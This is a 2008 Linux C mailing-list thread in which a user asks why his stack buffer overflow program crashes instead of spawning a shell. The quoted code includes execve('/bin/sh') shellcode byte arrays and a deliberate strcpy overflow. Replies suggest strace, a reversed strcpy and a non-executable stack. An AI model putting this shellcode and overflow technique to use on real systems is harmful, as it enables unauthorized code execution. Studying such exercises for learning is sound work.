Re: buffer overflow

ninjaboy <n0b0dyn1nj4@xxxxxxxxx> · Tue, 11 Mar 2008 13:12:29 +0100

2008/3/11, Patrik Båt, RTL <rtl@xxxxxxxxxxx>:
> Yeah, maybe some hardcore c coder in here can help you more...
>
>  My primary "tip of the day" was strace ;)
>
>
>  tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
>  > Patrik Båt wrote:
>  > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>  > >
>  > >> Hi all,
>  > >>
>  > >>              Can someone tell me whats is wrong with this program? All i
>  > >> get is seg fault. Iam trying to create a stack overflow and exec a
>  > >> shell. Somehow its not working. The system is x86 on linux.
>  > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>  > >> Copyright (C) 2006 Free Software Foundation, Inc.
>  > >> This is free software; see the source for copying conditions.  There is NO
>  > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>  > >>
>  > >>
>  > >>
>  > >> The Code:
>  > >> #include <stdio.h>
>  > >> #include <string.h>
>  > >>
>  > >> char shellcode[] =
>  > >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>  > >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>  > >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>  > >> #if 0
>  > >> char shellcode[] =
>  > >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>  > >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>  > >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>  > >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>  > >>
>  > >> #endif
>  > >>
>  > >> char large_string[128];
>  > >> int main() {
>  > >>   char buffer[96];
>  > >>   int i;
>  > >>   long *long_ptr = (long *) large_string;
>  > >>   memset(&buffer,0,sizeof(buffer));
>  > >>
>  > >>   for (i = 0; i < 32; i++)
>  > >>     *(long_ptr + i) =  (long)&buffer;
>  > >>
>  > >>   for (i = 0; i < strlen(shellcode); i++)
>  > >>     large_string[i] = shellcode[i];
>  > >>
>  > >>   strcpy(buffer,large_string);
>  > >>
>  > > strcpy(large_string,buffer);
>  > >
>  > > //This is working tho...
>  > >
>  > Thanks for the reply, but this doesnt spawn a shell, does it? This
>  > simply avoids the sigsegv
>  > >> }

Maybe stack is not executable?

-- 
noone is alone.
--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at  http://vger.kernel.org/majordomo-info.html